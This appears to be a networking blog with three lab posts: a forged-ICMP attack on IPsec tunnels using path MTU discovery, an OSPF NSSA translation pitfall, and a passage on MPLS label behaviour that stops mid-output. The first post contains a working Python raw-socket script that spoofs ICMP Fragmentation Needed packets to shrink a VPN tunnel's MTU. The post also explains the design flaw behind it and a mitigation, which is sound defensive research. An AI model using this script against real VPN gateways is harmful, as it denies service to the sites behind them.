IPsec & path MTU discovery: feature or vulnerability?

IPsec is a well-established technology for building VPN tunnels between sites. Path MTU discovery (PMTUD) is a feature that gives end hosts and VPN head ends visibility into the smallest MTU along the path so that they can adjust their own MTU accordingly. Is it possible to use the two features simultaneously? Sure, there is even an article from Cisco that walks the reader through the operation step by step. Should the two features be used simultaneously? That’s the question I would like to cover in this article.

IPsec VPNs are predominantly security-oriented – there are a number of features to ensure the CIA triad (confidentiality, integrity, availability). An IPsec device usually builds its tunnels over the Internet, so it has to withstand the attention of bad actors by design: the cost of the attack must be higher than the gain from it – that’s the idea that security is built upon. If you look closely at the description of PMTUD over IPsec, you will notice one peculiar aspect – the decision about a protected entity (the MTU of the IPsec tunnel) is based on completely unauthenticated feedback from the intermediate network (ICMP Fragmentation Needed). Is it possible to craft an ICMP packet that would decrease the MTU to an unacceptably low value?

Here is the topology we would use today for testing:

Most of the routers are running a rather common IOS image for 7200 – 15.2(4)M11. VPN4, however, is a newer platform, CSR1000v, running IOS XE 16.9.3, which we will put under pressure. Attacker is an Ubuntu host that is going to forge ICMP replies. For the purpose of this lab both VPN head ends have PMTUD enabled. The real MTU restriction is on the link between VPN2 and ISP, so we will be able to validate PMTUD operation prior to meddling with VPN4. Here are the configuration lines for each of the devices:

H1#show run | section router|interface
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
VPN2#show run | section router|ip route|crypto|interface
crypto isakmp policy 10
 authentication pre-share
crypto isakmp key cisco address 0.0.0.0        
crypto ipsec transform-set SET esp-aes 
 mode tunnel
crypto ipsec profile PROFILE
 set transform-set SET 
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface Tunnel0
 ip address 192.168.24.2 255.255.255.0
 ip ospf mtu-ignore
 tunnel source FastEthernet0/1
 tunnel mode ipsec ipv4
 tunnel destination 192.168.34.4
 tunnel path-mtu-discovery
 tunnel protection ipsec profile PROFILE
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
 ip mtu 1400
 ip ospf shutdown
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
ip route 192.168.34.4 255.255.255.255 192.168.23.3
ISP#show run | section interface          
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.100.3 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.23.3 255.255.255.0
 ip mtu 1400
interface FastEthernet1/0
 ip address 192.168.34.3 255.255.255.0
VPN4#show run | section router|ip route|interface|crypto
crypto isakmp policy 10
 authentication pre-share
crypto isakmp key cisco address 0.0.0.0        
crypto ipsec transform-set SET esp-aes 
 mode tunnel
crypto ipsec profile PROFILE
 set transform-set SET 
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface Tunnel0
 ip address 192.168.24.4 255.255.255.0
 ip ospf mtu-ignore
 tunnel source GigabitEthernet2
 tunnel mode ipsec ipv4
 tunnel destination 192.168.23.2
 tunnel path-mtu-discovery
 tunnel protection ipsec profile PROFILE
interface GigabitEthernet1
 ip address 192.168.45.4 255.255.255.0
interface GigabitEthernet2
 ip address 192.168.34.4 255.255.255.0
 ip ospf shutdown
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
ip route 192.168.23.2 255.255.255.255 192.168.34.3
H5#show run | section router|interface
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.45.5 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
root@Attacker#  tunctl -t tap0
root@Attacker#  ifconfig tap0 192.168.100.10/24 up
root@Attacker#  ip route add 192.168.34.0/24 via 192.168.100.3

Why is the ip ospf mtu-ignore command there on the tunnel interface? PMTUD is a unidirectional feature, so it is quite possible that one VPN head end has already decreased its MTU while its peer is just about to discover the restriction. If the OSPF adjacency is reset in such unfortunate circumstances, it cannot be restored by default due to the MTU mismatch in DBD packets.

Before we run any tests, let’s start the packet capture between ISP and VPN4 – our little emulation of attacker’s reconnaissance. We’re interested only in ICMP packets at this point. PMTUD is performed by the packets with DF-bit set:

H5#ping 1.1.1.1 source 5.5.5.5 size 1400 df-bit 
Type escape sequence to abort.
Sending 5, 1400-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
Packet sent with the DF bit set
.M.M.
Success rate is 0 percent (0/5)
H5#
H5#ping 1.1.1.1 source 5.5.5.5 size 1300 df-bit 
Type escape sequence to abort.
Sending 5, 1300-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
Packet sent with the DF bit set
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/46/52 ms
VPN4#show interface tunnel 0
Tunnel0 is up, line protocol is up 
<output omitted>
  Tunnel protocol/transport IPSEC/IP
  Tunnel TTL 255
  Path MTU Discovery, ager 10 mins, min MTU 92, MTU 1342, expires 00:09:28
  Tunnel transport MTU 1442 bytes
  Tunnel transmit bandwidth 8000 (kbps)
  Tunnel receive bandwidth 8000 (kbps)
  Tunnel protection via IPSec (profile "PROFILE")
<output omitted>

Good news – PMTUD is indeed operational: tunnel MTU is decreased to 1342 bytes. Beware, though: older IOS software does not show the MTU value in use:

Note: This change in value is stored internally and cannot be seen in the output of the show ip interface tunnel<#> command. You only see this change if you turn use the debug tunnel command.
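
The 1342-byte figure can be reproduced with a bit of arithmetic. The sketch below is a rough model rather than the router's actual algorithm: it assumes ESP in tunnel mode with AES-CBC and no integrity transform (the lab transform set is esp-aes only), a 20-byte outer IPv4 header, an 8-byte ESP header, a 16-byte IV and a 2-byte ESP trailer. The function name and its parameters are made up for illustration.

```python
def esp_tunnel_mtu(path_mtu: int,
                   outer_ip: int = 20,    # outer IPv4 header without options
                   esp_header: int = 8,   # SPI + sequence number
                   iv: int = 16,          # AES-CBC initialisation vector (assumed)
                   block: int = 16,       # AES block size
                   trailer: int = 2,      # pad length + next header
                   icv: int = 0) -> int:  # no integrity transform in this lab
    """Largest inner packet that still fits into path_mtu after ESP encapsulation."""
    room = path_mtu - outer_ip - esp_header - iv - icv
    ciphertext = room // block * block    # payload + padding + trailer fill whole blocks
    return ciphertext - trailer


print(esp_tunnel_mtu(1400))
```

Under these assumptions a 1400-byte path MTU leaves room for a 1342-byte inner packet, which agrees with the value reported by VPN4.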

Remember that ICMP Fragmentation Needed carries a part of the offending packet, so we might need it to forge our own ICMP reply:

Only ESP headers are included in ICMP, so the Attacker can intercept the packets and infer SPI and Sequence values – that should be enough to construct a packet that looks and feels legitimate. However, our task is even simpler: it is enough to trick VPN4 into decreasing MTU value significantly. Since a good engineer is a lazy engineer, we could just copy the contents of an intercepted ICMP reply and modify it accordingly:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

packet = bytearray(\
b"\x0c\x11\x72\x9e\x00\x01\xca\x03\x3c\xde\x00\x1c\x08\x00\x45\x00" \
b"\x00\x38\x00\x02\x00\x00\xff\x01\xf6\x6a\xc0\xa8\x22\x03\xc0\xa8" \
b"\x22\x04\x03\x04\xb2\x44\x00\x00\x05\x78\x45\x00\x05\xac\x04\xb3" \
b"\x40\x00\xfe\x32\xb8\x15\xc0\xa8\x22\x04\xc0\xa8\x17\x02\x5a\xe2" \
b"\xea\x4e\x00\x00\x00\x0e"
)

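# Offsets into the captured frame: 14 bytes of Ethernet + 20 bytes of IP, then
# ICMP type, code, checksum (2 bytes), unused (2 bytes), next-hop MTU (2 bytes)
CSUM = 2*16 + 4
MTU = 2*16 + 8

# Decrease the next-hop MTU by 1024 bytes (0x0400)
mtu = int.from_bytes(packet[MTU:MTU + 2], "big") - 0x0400
packet[MTU:MTU + 2] = mtu.to_bytes(2, "big")

# The checksum is a one's complement sum, so it grows by the same 0x0400;
# a carry out of the 16-bit word is folded back into the low bits
csum = int.from_bytes(packet[CSUM:CSUM + 2], "big") + 0x0400
csum = (csum & 0xFFFF) + (csum >> 16)
packet[CSUM:CSUM + 2] = csum.to_bytes(2, "big")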

packet = packet[14:]
s.sendto(packet, ('192.168.34.4', 0))
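
For anyone who wants to double-check the adjustment made in the script above, here is a minimal sketch that decodes the ICMP part of the same captured bytes and recomputes the checksum from scratch instead of patching it. The helper name internet_checksum is my own; the byte string is copied from the script with the Ethernet and outer IP headers removed.

```python
import struct


def internet_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's complement of the one's complement 16-bit sum."""
    data = bytes(data)
    if len(data) % 2:
        data += b"\x00"
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)   # fold the carries back in
    return ~total & 0xFFFF


icmp = bytes.fromhex(
    "0304b24400000578"                          # type, code, checksum, unused, next-hop MTU
    "450005ac04b34000fe32b815c0a82204c0a81702"  # IP header of the offending ESP packet
    "5ae2ea4e0000000e"                          # first 8 bytes of ESP: SPI and sequence
)

icmp_type, code, checksum, _unused, mtu = struct.unpack("!BBHHH", icmp[:8])
spi, seq = struct.unpack("!II", icmp[28:36])
print(icmp_type, code, hex(checksum), mtu, hex(spi), seq)

# A valid message checksums to zero when the checksum field itself is included
print(internet_checksum(icmp) == 0)

# Forge the MTU, zero the checksum field and recompute it over the whole message
forged = bytearray(icmp)
forged[6:8] = (mtu - 1024).to_bytes(2, "big")
forged[2:4] = b"\x00\x00"
forged[2:4] = internet_checksum(forged).to_bytes(2, "big")
print(forged[2:4].hex(), int.from_bytes(forged[6:8], "big"))
```

The full recomputation arrives at the same checksum as the shortcut (0xb2 + 0x04 = 0xb6 in the high byte), and the forged next-hop MTU becomes 376 bytes.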

Checksum adjustment involves a bit of ancient magic in case of the carryover, though the idea itself is simple – decrease the high byte of the MTU by 0x04 while increasing the high byte of the checksum by the same amount. Quite straightforward, isn’t it? Let’s see whether it has any effect:

root@Attacker# python3 pckt.py
VPN4#show interfaces tunnel0
Tunnel0 is up, line protocol is up
<output omitted>
Tunnel protocol/transport IPSEC/IP
Tunnel TTL 255
Path MTU Discovery, ager 10 mins, min MTU 92, MTU 318, expires 00:09:48
Tunnel transport MTU 1442 bytes
Tunnel transmit bandwidth 8000 (kbps)
Tunnel receive bandwidth 8000 (kbps)
Tunnel protection via IPSec (profile "PROFILE")
<output omitted>
H5#ping 1.1.1.1 source 5.5.5.5 size 1300 df-bit 
Type escape sequence to abort.
Sending 5, 1300-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
Packet sent with the DF bit set
M.M.M
Success rate is 0 percent (0/5)

Evidently, the attack is successful. Implications? Well, for starters, packets with the DF bit set that exceed the forged MTU cannot make it through, so the availability of the VPN service is impacted. Regular packets would still get fragmented and sent over the IPsec tunnel. The fragmentation is always done by the CPU though, so a surge of fragmented packets would result in a CPU spike; in such a case router availability would be at risk, potentially denying the service altogether to the whole site.
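
To get a feeling for the extra fragmentation work, here is a back-of-the-envelope sketch. It assumes that the router fragments the inner packet down to the tunnel MTU before encryption, that IPv4 headers carry no options, and that hosts send 1500-byte packets without the DF bit; the function name is hypothetical.

```python
import math


def fragment_count(packet_len: int, mtu: int, ip_header: int = 20) -> int:
    """Number of IPv4 fragments needed to carry packet_len bytes over the given MTU."""
    if packet_len <= mtu:
        return 1
    payload = packet_len - ip_header
    per_fragment = (mtu - ip_header) // 8 * 8   # fragment offsets count 8-byte units
    return math.ceil(payload / per_fragment)


for tunnel_mtu in (1342, 318):
    print(tunnel_mtu, fragment_count(1500, tunnel_mtu))
```

With these assumptions a full-size packet needs 2 fragments at a tunnel MTU of 1342 bytes and 5 fragments at 318 bytes, each of which has to be encrypted separately.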

Is it a defect though? Unfortunately, it is not a bug to be fixed, but a flaw in the feature design: the router has to trust unauthenticated packets from an arbitrary source within the transit network. Even if the ICMP reply included some part of the ESP payload with any anti-replay protection, the ICV value would most likely be omitted, thus sacrificing the ESP integrity check. In the end, the only way to avoid such an attack is to disable PMTUD on the tunnel and configure the MTU manually. Luckily, most of the paths in the modern Internet can cope with the default MTU of 1500, so a static MTU for a tunnel should perform fine.

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn, Twitter

OSPF NSSA: yet another way to shoot yourself in the foot

There are quite a few blog posts on the Internet explaining that a complex OSPF setup is usually more complicated than it’s worth. One of the quirks contributing to such overcomplication is the not-so-stubby area (NSSA). If you’re not yet convinced by the naming of the feature, take a look at this post by Ivan Pepelnjak. Still interested? I’ve got one more example for you that might divert your design decision to BGP for complex scenarios.

Here is a sample topology:

Area 1 is NSSA, so both R1 and R2 are ABRs. R1 is also ASBR that redistributes 1.1.1.1/32 prefix. All links have default cost of 1 with a single exception – R1-R2 acts as backup so it has an increased cost of 10. Here is the basic config for such a setup:

R1#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
 ip ospf 1 area 1
 ip ospf cost 10
interface FastEthernet0/1
 ip address 192.168.13.1 255.255.255.0
 ip ospf 1 area 0
router ospf 1
 router-id 1.1.1.1
 area 1 nssa
 redistribute connected subnets
R2#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
 ip ospf 1 area 1
 ip ospf cost 10
interface FastEthernet0/1
 ip address 192.168.24.2 255.255.255.0
router ospf 1
 router-id 2.2.2.2
 area 1 nssa
 network 0.0.0.0 255.255.255.255 area 0
R3#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.34.3 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.13.3 255.255.255.0
router ospf 1
 router-id 3.3.3.3
 network 0.0.0.0 255.255.255.255 area 0
R4#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.34.4 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.24.4 255.255.255.0
router ospf 1
 router-id 4.4.4.4
 network 0.0.0.0 255.255.255.255 area 0

R4 should have two paths to 1.1.1.1/32:

  1. the primary one through R3 due to LSA5, originated by R1;
  2. the backup one through R2 due to LSA5, originated by R2 based on LSA7 contents.

However, that’s not the case:

R4#show ip os database | begin Type-5
		Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
1.1.1.1         1.1.1.1         876         0x80000002 0x0099FD 0

Maybe the LSAs are considered functionally equivalent? Unlikely, since LSA5 from R1 should have lost to the competition (1.1.1.1 is lower than 2.2.2.2). Well, let’s check the connectivity first:

R4#traceroute 1.1.1.1 source 4.4.4.4
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.3 48 msec 44 msec 52 msec
  2 192.168.13.1 44 msec 48 msec 48 msec

The primary path is definitely operational, so let’s verify that the backup one would kick in properly:

R3(config)#interface FastEthernet 0/1
R3(config-if)#ip ospf shutdown
R4#ping 1.1.1.1 source 4.4.4.4
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4 
.....
Success rate is 0 percent (0/5)
R4#
R4#show ip route 1.1.1.1   
% Network not in table

As you can see, there is no backup route at all! There is a sickening void in the LSDB as well:

R4#show ip ospf database          

            OSPF Router with ID (4.4.4.4) (Process ID 1)

		Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         1186        0x80000005 0x0092A2 1
2.2.2.2         2.2.2.2         1437        0x80000006 0x006991 2
3.3.3.3         3.3.3.3         90          0x80000007 0x0032A8 2
4.4.4.4         4.4.4.4         1293        0x80000004 0x00AD0A 3

		Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.13.1    1.1.1.1         1186        0x80000004 0x00E8C2
192.168.24.2    2.2.2.2         1437        0x80000002 0x009FF5
192.168.34.3    3.3.3.3         1357        0x80000002 0x002B57

		Summary Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.12.0    1.1.1.1         1446        0x80000002 0x009721
192.168.12.0    2.2.2.2         1437        0x80000003 0x00773C
          
		Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
1.1.1.1         1.1.1.1         1446        0x80000002 0x0099FD 0

Note that LSAs from R1 are not flushed by other routers in the area. However, the graph is disconnected (there is no bidirectional edge between R1 and R3), so 1.1.1.1/32 is considered unreachable through R3. If you’d like more information on the OSPF graph computation process, check out this post. However, the main mystery is not solved yet.
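
The two-way check can be illustrated with a toy model. The sketch below is a simplification, not the real SPF: it ignores network LSAs and costs, and represents each Router LSA as a plain set of neighbours. The function and variable names are mine.

```python
from collections import deque


def reachable(lsdb: dict, root: str) -> set:
    """Routers reachable from root using only links advertised by both ends."""
    seen = {root}
    queue = deque([root])
    while queue:
        node = queue.popleft()
        for neighbour in lsdb.get(node, set()):
            # Two-way check: the neighbour must list this node as well
            if node in lsdb.get(neighbour, set()) and neighbour not in seen:
                seen.add(neighbour)
                queue.append(neighbour)
    return seen


# Area 0 after "ip ospf shutdown" on R3 Fa0/1: the LSA from R1 still claims
# a link towards R3, but R3 no longer advertises the link back.
area0 = {
    "R1": {"R3"},
    "R2": {"R4"},
    "R3": {"R4"},
    "R4": {"R2", "R3"},
}

print(sorted(reachable(area0, "R4")))
```

R1 stays in the database, yet it never makes it into the tree rooted at R4, so nothing it advertises can be used.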

There will be no salvation though: LSA5 will never get generated by R2 according to RFC 1587 (same holds true for RFC 3101 as well):

If a router is attached to another AS and is also an NSSA area border router, it may originate a both a type-5 and a type-7 LSA for the same network.  The type-5 LSA will be flooded to the backbone (and all attached type-5 capable areas) and the type-7 will be flooded into the NSSA.  If this is the case, the P-bit must be reset in the type-7 NSSA so the type-7 LSA isn’t again translated into a type-5 LSA by another NSSA area border router.

As you could have already guessed, that’s exactly our case (No Type 7/5 translation option):

R2#show ip ospf database nssa-external 

            OSPF Router with ID (2.2.2.2) (Process ID 1)

		Type-7 AS External Link States (Area 1)

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 248
  Options: (No TOS-capability, No Type 7/5 translation, DC, Upward)
  LS Type: AS External Link
  Link State ID: 1.1.1.1 (External Network Number )
  Advertising Router: 1.1.1.1
  LS Seq Number: 80000005
  Checksum: 0x771B
  Length: 36
  Network Mask: /32
	Metric Type: 2 (Larger than any link state path)
	MTID: 0 
	Metric: 20 
	Forward Address: 0.0.0.0
	External Route Tag: 0
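
The decision that R2 takes for this LSA can be sketched in a few lines. This is a simplified model under my reading of RFC 3101 (translate only Type-7 LSAs that have the P-bit set and a non-zero forwarding address); the class and function names are hypothetical, and the translator election is left out entirely.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Type7Lsa:
    prefix: str
    adv_router: str
    p_bit: bool
    forward_address: str


def translate(lsa: Type7Lsa, translator_id: str) -> Optional[dict]:
    """Return the Type-5 LSA a translating ABR would originate, or None."""
    if not lsa.p_bit:
        return None   # shown as "No Type 7/5 translation" in the output above
    if lsa.forward_address == "0.0.0.0":
        return None   # assumption: a non-zero forwarding address is required
    return {
        "prefix": lsa.prefix,
        "adv_router": translator_id,
        "forward_address": lsa.forward_address,
    }


lab_lsa = Type7Lsa("1.1.1.1/32", "1.1.1.1", p_bit=False, forward_address="0.0.0.0")
print(translate(lab_lsa, "2.2.2.2"))
```

For the LSA from the lab the function returns None: R1 cleared the P-bit because it originates its own Type-5 LSA, so R2 has nothing to translate.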

Conclusion? Don’t make the complex protocol even more complicated. If it’s an absolute must, then stick to the designs, published by vendors, test everything you can lay your hands on and don’t deviate from the two points above – vendor support and infrastructure availability are at stake here.

Kudos for review: Anastasiia Kuraleva


MPLS: a bit of this, a bit of that

Introduction

If you have ever worked with MPLS either in a lab or in production, you should have noticed that the technology itself is fairly straightforward. However, there are quite a few quirks that might make life more difficult than it has to be. Most of those peculiar aspects are extensively discussed in a plethora of posts on the net, but not all of them, unfortunately. Today I’d like to make a humble contribution to the knowledge base with a few less known/described features that do not really warrant a separate post but are interesting nevertheless.

The topology is utterly straightforward:

MPLS is deployed within ISP just for traffic encapsulation – no typical use case (L3VPN, TE, etc.) is active here. IGP is vanilla OSPF while the purpose for the several areas is to allow some minor routing manipulation on PEs. Below you could find the initial configs:

CE1#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface Loopback1
 ip address 1.1.2.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
router ospf 1
 router-id 1.1.1.1
 network 0.0.0.0 255.255.255.255 area 1
PE1#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
 ip ospf 1 area 1
interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
router ospf 1
 mpls ldp autoconfig area 0
 router-id 2.2.2.2
 area 1 range 1.1.1.0 255.255.255.0
 network 0.0.0.0 255.255.255.255 area 0
P#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/1
 ip address 192.168.23.3 255.255.255.0
interface FastEthernet1/0
 ip address 192.168.34.3 255.255.255.0
router ospf 1
 mpls ldp autoconfig
 router-id 3.3.3.3
 network 0.0.0.0 255.255.255.255 area 0
PE2#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.45.4 255.255.255.0
 ip ospf 1 area 2
interface FastEthernet1/0
 ip address 192.168.34.4 255.255.255.0
router ospf 1
 mpls ldp autoconfig area 0
 network 0.0.0.0 255.255.255.255 area 0
CE2#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.45.5 255.255.255.0
router ospf 1
 router-id 5.5.5.5
 network 0.0.0.0 255.255.255.255 area 2

Story 1: PHP confession

The theory behind penultimate hop popping (PHP) is widely known and described; here is a good recap if you feel rusty. However, most of the authors omit several important details to make the introduction to the topic easier.

  1. Labels are allocated by LDP for all prefixes except the ones received from BGP. In the latter case BGP is the protocol responsible for label allocation, be it VPNv4 AF, labelled unicast or any other relevant application.
  2. Although PHP removes a lookup in the general case, the implicit-null label applies only to connected and aggregated routes; the transit ones are still allocated a regular label. The reason is simple: both connected and aggregated routes require a lookup anyway, while transit routes can be forwarded further based on the label.

Let’s verify that last statement in our lab:

CE2#show ip route ospf
<output omitted>

      1.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
O IA     1.1.1.0/24 [110/5] via 192.168.45.4, 00:07:20, FastEthernet0/0
O IA     1.1.2.1/32 [110/5] via 192.168.45.4, 00:05:26, FastEthernet0/0
      2.0.0.0/32 is subnetted, 1 subnets
O IA     2.2.2.2 [110/4] via 192.168.45.4, 00:52:54, FastEthernet0/0
      3.0.0.0/32 is subnetted, 1 subnets
O IA     3.3.3.3 [110/3] via 192.168.45.4, 00:52:54, FastEthernet0/0
      4.0.0.0/32 is subnetted, 1 subnets
O IA     4.4.4.4 [110/2] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA  192.168.12.0/24 [110/4] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA  192.168.23.0/24 [110/3] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA  192.168.34.0/24 [110/2] via 192.168.45.4, 00:52:54, FastEthernet0/0
CE2#
CE2#traceroute 1.1.1.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.45.4 12 msec 12 msec 8 msec
  2 192.168.34.3 [MPLS: Label 23 Exp 0] 48 msec 12 msec 32 msec
  3 192.168.23.2 68 msec 36 msec 40 msec
  4 192.168.12.1 76 msec 96 msec 44 msec
CE2#
CE2#traceroute 192.168.12.1 source 5.5.5.5            
Type escape sequence to abort.
Tracing the route to 192.168.12.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.45.4 8 msec 16 msec 12 msec
  2 192.168.34.3 [MPLS: Label 19 Exp 0] 12 msec 32 msec 28 msec
  3 192.168.23.2 64 msec 44 msec 44 msec
  4 192.168.12.1 56 msec 48 msec 60 msec
CE2#
CE2#traceroute 1.1.2.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 1.1.2.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.45.4 16 msec 20 msec 20 msec
  2 192.168.34.3 [MPLS: Label 24 Exp 0] 52 msec 64 msec 56 msec
  3 192.168.23.2 [MPLS: Label 23 Exp 0] 64 msec 48 msec 64 msec
  4 192.168.12.1 100 msec 80 msec 84 msec

Note that the allocated labels are different due to per-prefix label allocation. Connected routes require a lookup, since it’s not possible to infer the next-hop and corresponding L2 information from the ingress label; the same is valid for the summary as well. The packet towards 1.1.2.1/32, however, can be forwarded to its next-hop immediately:

PE1#show mpls forwarding-table 1.1.1.0 24 detail 
Local      Outgoing   Prefix           Bytes Label   Outgoing   Next Hop    
Label      Label      or Tunnel Id     Switched      interface              
None       No Label   1.1.1.0/24       0             punt       
	MAC/Encaps=0/0, MRU=0, Label Stack{}
	No output feature configured
PE1#
PE1#show mpls forwarding-table 192.168.12.0 24 detail 
Local      Outgoing   Prefix           Bytes Label   Outgoing   Next Hop    
Label      Label      or Tunnel Id     Switched      interface              
None       No Label   192.168.12.0/24  0             punt       
	MAC/Encaps=0/0, MRU=0, Label Stack{}
	No output feature configured
PE1#
PE1#show mpls forwarding-table 1.1.2.1 32 detail 
Local      Outgoing   Prefix           Bytes Label   Outgoing   Next Hop    
Label      Label      or Tunnel Id     Switched      interface              
23         No Label   1.1.2.1/32       672           Fa0/0      192.168.12.1
	MAC/Encaps=14/14, MRU=1504, Label Stack{}
	CA010BDB0008CA020BDF00080800 
	No output feature configured
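
The allocation rule from this story can be condensed into a short sketch. It is only a model of the behaviour observed above, not of the LDP implementation; the route classification strings and the function name are invented, and the numeric labels it hands out are arbitrary (the lab routers picked different ones).

```python
from itertools import count

IMPLICIT_NULL = 3   # reserved label value that asks the upstream router to pop


def build_bindings(routes: dict, first_label: int = 16) -> dict:
    """Map each prefix to the label an LSR would advertise for it."""
    labels = count(first_label)
    bindings = {}
    for prefix, kind in routes.items():
        if kind in ("connected", "summary"):
            # An IP lookup is needed anyway, so let the previous hop pop the label
            bindings[prefix] = IMPLICIT_NULL
        else:
            # Transit prefix: can be forwarded based on the label alone
            bindings[prefix] = next(labels)
    return bindings


pe1_routes = {
    "192.168.12.0/24": "connected",
    "1.1.1.0/24": "summary",
    "1.1.2.1/32": "ospf",
}
print(build_bindings(pe1_routes))
```

Only 1.1.2.1/32 ends up with a real label, which is why it is the only destination in the traceroutes above that still shows a label on the last MPLS hop.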

Story 2: peculiar loopback

Another curious behaviour is connected with “misconfiguring” loopback subnet mask. It is widely accepted that loopback should have /32 mask. Indeed, why waste precious addressing space? However, my hand has slipped several times to configure familiar /24 mask in a lab. The consequences might be sometimes difficult to grasp and troubleshoot. Let’s make a change to our topology:

PE1(config)#interface loopback 0
PE1(config-if)#ip address 2.2.2.2 255.255.255.0

Nothing major, right? However, your LSP has just broken down:

PE2#traceroute mpls ipv4 2.2.2.0/24 source 4.4.4.4 verbose 
Tracing MPLS Label Switched Path to 2.2.2.0/24, timeout is 2 seconds

Codes: '!' - success, 'Q' - request not sent, '.' - timeout,
  'L' - labeled output interface, 'B' - unlabeled output interface, 
  'D' - DS Map mismatch, 'F' - no FEC mapping, 'f' - FEC mismatch,
  'M' - malformed request, 'm' - unsupported tlvs, 'N' - no label entry, 
  'P' - no rx intf label prot, 'p' - premature termination of LSP, 
  'R' - transit router, 'I' - unknown upstream index,
  'X' - unknown return code, 'x' - return code 0

Type escape sequence to abort.
  0 4.4.4.4 0.0.0.0 MRU 0 [No Label]
Q 1 *

The reason for the outage is the absence of relevant label on P. It could be that the route is not propagating correctly:

P#show ip route 2.2.2.0 255.255.255.0 longer-prefixes 
<output omitted>
      2.0.0.0/32 is subnetted, 1 subnets
O        2.2.2.2 [110/2] via 192.168.23.2, 01:24:24, FastEthernet0/1
P#
P#show ip cef 2.2.2.2/32 detail
2.2.2.2/32, epoch 0
  local label info: global/16
  nexthop 192.168.23.2 FastEthernet0/1

No, it’s exactly as we’ve intended it to be, except for the lack of label in the CEF output. Labels are distributed by LDP, so let’s check what we receive from PE1 on P:

P#show mpls ldp bindings neighbor 2.2.2.2    
  lib entry: 1.1.1.0/24, rev 22
	remote binding: lsr: 2.2.2.2:0, label: imp-null
  lib entry: 1.1.1.1/32, rev 27
	remote binding: lsr: 2.2.2.2:0, label: 16
  lib entry: 1.1.2.1/32, rev 24
	remote binding: lsr: 2.2.2.2:0, label: 23
  lib entry: 2.2.2.0/24, rev 28
	remote binding: lsr: 2.2.2.2:0, label: imp-null
  lib entry: 3.3.3.3/32, rev 2
	remote binding: lsr: 2.2.2.2:0, label: 18
  lib entry: 4.4.4.4/32, rev 16
	remote binding: lsr: 2.2.2.2:0, label: 20
  lib entry: 5.5.5.5/32, rev 20
	remote binding: lsr: 2.2.2.2:0, label: 22
  lib entry: 192.168.12.0/24, rev 14
	remote binding: lsr: 2.2.2.2:0, label: imp-null
  lib entry: 192.168.23.0/24, rev 4
	remote binding: lsr: 2.2.2.2:0, label: imp-null
  lib entry: 192.168.34.0/24, rev 6
